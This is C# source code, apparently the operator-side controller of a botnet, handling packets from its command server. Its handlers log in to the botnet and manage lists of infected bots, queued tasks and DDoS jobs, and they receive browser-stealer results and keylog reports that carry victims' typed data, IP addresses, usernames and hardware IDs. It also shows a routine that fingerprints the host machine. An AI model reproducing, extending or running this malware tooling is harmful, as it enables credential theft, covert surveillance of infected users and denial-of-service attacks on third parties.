void m_ClientSocket_OnClientConnected()
{
CDDoSHandler.StopAll();
CPacket Packet = m_ClientSocket.CreatePacket((Byte)BOT_PACKET.IDENT, String.Format("{0}|{1}|{2}|{3}|{4}", CBot.BotConfig.BotVersion, CUtils.GetOS(), CUtils.GetUsername(), CUtils.GetSHA1(CUtils.GetVolumeSerial()), CUtils.GetIPv4()));
if (!m_ClientSocket.SendPacket(Packet))
{
m_ClientSocket.Disconnect();
}
}
void m_ClientSocket_OnClientReceiveData(CPacket Packet)
{
if (this.OnPacketReceived != null)
{
this.OnPacketReceived.Invoke(Packet);
}
try
{
#region PARSE_ARGUMENTS
byte[] arr_bArguments = Packet.GetPacketBufferFromBlocks();
String[] arr_strArguments = null;
if (arr_bArguments != null)
{
arr_strArguments = UnicodeEncoding.Unicode.GetString(arr_bArguments, 0, arr_bArguments.Length).Split('|');
}
#endregion
MASTER_PACKET MasterPacket = (MASTER_PACKET)Packet.PacketHeader.Packet;
switch (MasterPacket)
{
#region LOGIN_PACKET
case MASTER_PACKET.LOGIN:
{
if (arr_strArguments == null || arr_strArguments.Length != CConstants.LOGIN_ARGUMENT_COUNT)
{
m_ClientSocket_OnLog("Corrupted LOGIN Packet received.");
break;
}
/*
* [0] = Botnet name
*/
if (this.OnLogin != null)
{
this.OnLogin.Invoke(arr_strArguments[0]);
}
this.IsAuthorized = true;
m_ClientSocket_OnLog("LOGIN Packet received. You are now authorized.");
}
break;
#endregion
#region LOGIN_KEY_PACKET
case MASTER_PACKET.LOGIN_KEY:
{
if (arr_strArguments == null || arr_strArguments.Length != CConstants.LOGIN_KEY_ARGUMENT_COUNT)
{
m_ClientSocket_OnLog("Corrupted LOGIN_KEY Packet received.");
break;
}
Int32 iData = -1;
if (Int32.TryParse(arr_strArguments[0], out iData))
{
if (iData == 1) //Server requested Public Key a.k.a First authorization
{
m_ClientSocket_OnLog("Server asked for Public-Key");
CPacket PublicKey = m_ClientSocket.CreatePacket((Byte)MASTER_PACKET.LOGIN_KEY, Program.ControllerConfig.AdminPublicKey);
if (!m_ClientSocket.SendPacket(PublicKey))
{
m_ClientSocket_OnLog("Failed to send Public-Key to server.");
m_ClientSocket.Disconnect();
}
else
{
m_ClientSocket_OnLog("Public-Key sent to server.");
}
}
}
else
{
m_ClientSocket_OnLog("Received Encrypted Random-Message for Authorization");
//This is the random encrypted message
Byte[] arr_bEncryptedAuth = Convert.FromBase64String(arr_strArguments[0]);
//Decrypt it with Private Key
arr_bEncryptedAuth = CRSA.Decrypt(arr_bEncryptedAuth, Program.ControllerConfig.AdminPrivateKey, 2048);
//Failed to decrypt
if (arr_bEncryptedAuth == null)
{
m_ClientSocket_OnLog("Failed to decrypt Random-Message");
m_ClientSocket.Disconnect();
return;
}
//Send plain-text response to confirm authorization
/*if (!m_ClientSocket.SendData(this.BuildPacket(MASTER_PACKET.LOGIN_KEY, arr_bEncryptedAuth)))
* m_ClientSocket.Disconnect();*/
CPacket AuthPacket = m_ClientSocket.CreatePacket((Byte)MASTER_PACKET.LOGIN_KEY, arr_bEncryptedAuth);
if (!m_ClientSocket.SendPacket(AuthPacket))
{
m_ClientSocket_OnLog("Failed to send decrypted Random-Message. Authorization failed.");
m_ClientSocket.Disconnect();
}
else
{
m_ClientSocket_OnLog("Decrypted Random-Message sent to Server. Authorization complete. Waiting for answer.");
}
}
}
break;
#endregion
#region BOTLIST_PACKET
case MASTER_PACKET.BOTLIST:
{
if (arr_strArguments == null || arr_strArguments.Length != CConstants.BOTLIST_ARGUMENT_COUNT)
{
m_ClientSocket_OnLog("Corrupted BOTLIST packet received.");
break;
}
/*
* [0] = Botlist
* [1] = Page
*/
int iCurrentBotPage = -1;
if (Int32.TryParse(arr_strArguments[1], out iCurrentBotPage))
{
Program.ControllerConfig.CurrentBotPage = iCurrentBotPage;
String[] arr_strBots = arr_strArguments[0].Split(';');
if (this.OnBots != null)
{
this.OnBots.Invoke(arr_strBots, Program.ControllerConfig.CurrentBotPage);
}
m_ClientSocket_OnLog("BOTLIST packet received. Your Botlist has been updated.");
}
}
break;
#endregion
#region TASKLIST_PACKET
case MASTER_PACKET.TASKLIST:
{
if (arr_strArguments == null || arr_strArguments.Length != CConstants.TASKLIST_ARGUMENT_COUNT)
{
m_ClientSocket_OnLog("Corrupted TASKLIST packet received.");
break;
}
/*
* arr_strArguments:
* [0] = Tasks
* [1] = Page
*/
String[] arr_strTasks = arr_strArguments[0].Split(';');
if (OnMainTasks != null)
{
OnMainTasks.Invoke(arr_strTasks);
m_ClientSocket_OnLog("TASKLIST packet received. Your Main Tasklist has been updated.");
}
}
break;
#endregion
#region REMOVE_TASK_PACKET
case MASTER_PACKET.REMOVE_TASK:
{
if (arr_strArguments == null || arr_strArguments.Length != CConstants.TASK_REMOVE_ARGUMENT_COUNT)
{
m_ClientSocket_OnLog("Corrupted REMOVE_TASK Packet received.");
break;
}
Int32 iRemovedTaskID = -1;
if (Int32.TryParse(arr_strArguments[0], out iRemovedTaskID))
{
if (OnMainTaskRemoved != null)
{
OnMainTaskRemoved.Invoke(iRemovedTaskID);
m_ClientSocket_OnLog(String.Format("REMOVE_TASK packet received. Task: {0} has been removed.",
iRemovedTaskID));
}
}
}
break;
#endregion
#region STATISTICS_PACKET
case MASTER_PACKET.STATISTICS:
{
if (!this.IsAuthorized)
{
this.m_ClientSocket.Disconnect();
}
if (arr_strArguments == null || arr_strArguments.Length != CConstants.STATISTICS_ARGUMENT_COUNT)
{
m_ClientSocket_OnLog("Corrupted STATISTICS packet received.");
break;
}
int iStatisticsType = -1;
if (!int.TryParse(arr_strArguments[0], out iStatisticsType))
{
break;
}
STATISTICS_TYPE StatisticsType = (STATISTICS_TYPE)iStatisticsType;
switch (StatisticsType)
{
case STATISTICS_TYPE.INFORMATION:
string[] arr_strInfoData = arr_strArguments[1].Split(';');
if (arr_strInfoData.Length != 8)
{
break;
}
/*
* arr_strArguments:
* [0] = Total Bots
* [1] = Online Bots
* [2] = Total Bot Pages
* [3] = Total Main Tasks
* [4] = Total Main Tasks Pages
* [5] = Total Browser Stealer
* [6] = Total Keylog Reports
*/
int iTotalBots, iOnlineBots, iTotalMainTasks, iTotalDdosTasks, iTotalBrowserStealer, iTotalKeylogReports;
int iAVGCPU;
if (Int32.TryParse(arr_strInfoData[0], out iTotalBots) &&
Int32.TryParse(arr_strInfoData[1], out iOnlineBots) &&
Int32.TryParse(arr_strInfoData[2], out iTotalMainTasks) &&
Int32.TryParse(arr_strInfoData[3], out Program.ControllerConfig.ResultsPerPage) &&
int.TryParse(arr_strInfoData[4], out iTotalDdosTasks) &&
int.TryParse(arr_strInfoData[5], out iTotalBrowserStealer) &&
int.TryParse(arr_strInfoData[6], out iTotalKeylogReports) &&
int.TryParse(arr_strInfoData[7], out iAVGCPU))
{
if (this.OnTotalBots != null)
{
this.OnTotalBots.Invoke(iTotalBots, iOnlineBots);
}
Program.ControllerConfig.TotalBotPages = CUtils.GetPageCount(iTotalBots);
if (this.OnTotalMainTasks != null)
{
this.OnTotalMainTasks.Invoke(iTotalMainTasks);
}
if (this.OnResultsPerPage != null)
{
this.OnResultsPerPage.Invoke();
}
if (this.OnTotalDdos != null)
{
this.OnTotalDdos.Invoke(iTotalDdosTasks);
}
Program.ControllerConfig.TotalBrowserStealer = iTotalBrowserStealer;
Program.ControllerConfig.TotalStealerPages = CUtils.GetPageCount(iTotalBrowserStealer);
Program.ControllerConfig.TotalKeylog = iTotalKeylogReports;
Program.ControllerConfig.TotalKeylogPages = CUtils.GetPageCount(iTotalKeylogReports);
// if (this.OnTotalKeylogReports != null) this.OnTotalKeylogReports.Invoke(iTotalKeylogReports);
Program.ControllerConfig.AverageCPUUsage = iAVGCPU;
m_ClientSocket_OnLog("Information STATISTICS packet received. Statistics has been updated.");
}
break;
case STATISTICS_TYPE.OS:
string[] arr_strOSData = arr_strArguments[1].Split(';');
if (arr_strOSData != null && this.OnOSStatistics != null)
{
this.OnOSStatistics.Invoke(arr_strOSData);
}
m_ClientSocket_OnLog("OS STATISTICS packet received. OS Statistics has been updated.");
break;
case STATISTICS_TYPE.COUNTRY:
string[] arr_strCountryData = arr_strArguments[1].Split(';');
if (arr_strCountryData != null && this.OnCountryStatistics != null)
{
this.OnCountryStatistics.Invoke(arr_strCountryData);
}
m_ClientSocket_OnLog("Country STATISTICS packet received. Country Statistics has been updated.");
break;
default: break;
}
}
break;
#endregion
#region DDOSLIST_PACKET
case MASTER_PACKET.DDOSLIST:
{
string[] arr_strDdoslist = null;
if (arr_strArguments != null && arr_strArguments.Length == CConstants.DDOSLIST_ARGUMENT_COUNT)
{
arr_strDdoslist = arr_strArguments[0].Split(';');
}
if (this.OnDdosList != null)
{
this.OnDdosList.Invoke(arr_strDdoslist);
}
}
break;
#endregion
#region STEALERLIST_PACKET
case MASTER_PACKET.STEALERLIST:
{
if (arr_strArguments == null || arr_strArguments.Length != 2)
{
m_ClientSocket_OnLog("Corrupted STEALERLIST packet received.");
break;
}
int iPage = -1;
if (!int.TryParse(arr_strArguments[1], out iPage))
{
break;
}
var StealerList = arr_strArguments[0].Split(';');
if (this.OnBrowserStealer != null)
{
this.OnBrowserStealer.Invoke(StealerList, iPage);
}
}
break;
#endregion
#region KEYLOGLIST_PACKET
case MASTER_PACKET.KEYLOGLIST:
{
if (arr_strArguments == null || arr_strArguments.Length != 2)
{
m_ClientSocket_OnLog("Corrupted KEYLOGLIST packet received.");
break;
}
int iPage = -1;
if (!int.TryParse(arr_strArguments[1], out iPage))
{
break;
}
var KeylogList = arr_strArguments[0].Split(';');
if (this.OnKeylogReports != null)
{
this.OnKeylogReports.Invoke(KeylogList, iPage);
}
}
break;
#endregion
#region KEYLOG_REPORT_PACKET
case MASTER_PACKET.KEYLOG:
{
if (arr_strArguments == null || arr_strArguments.Length != 1)
{
m_ClientSocket_OnLog("Corrupted KEYLOG Report packet received.");
break;
}
var arr_strReportData = arr_strArguments[0].Split('*');
/*
* [0] = Title
* [1] = Length
* [2] = Bot ID
* [3] = Data
* [4] = ID
* [5] = Bot IPv4
* [6] = Bot OS
* [7] = Bot Username
* [8] = Bot HWID
*/
if (arr_strReportData.Length != 9)
{
m_ClientSocket_OnLog("Corrupted KEYLOG Report data.");
break;
}
if (this.OnKeylogReport != null)
{
this.OnKeylogReport.Invoke(arr_strReportData);
}
}
break;
#endregion
#region KEYLOG_REMOVE_PACKET
case MASTER_PACKET.KEYLOG_REMOVE:
{
if (arr_strArguments == null || arr_strArguments.Length != 1)
{
m_ClientSocket_OnLog("Corrupted KEYLOG_REMOVE packet received.");
break;
}
int iReportID = -1;
if (!int.TryParse(arr_strArguments[0], out iReportID))
{
break;
}
if (this.OnKeylogReportRemoved != null)
{
this.OnKeylogReportRemoved.Invoke(iReportID);
}
}
break;
#endregion
default:
{
m_ClientSocket_OnLog("Unknown Packet received.");
break;
}
}
}
catch { }
}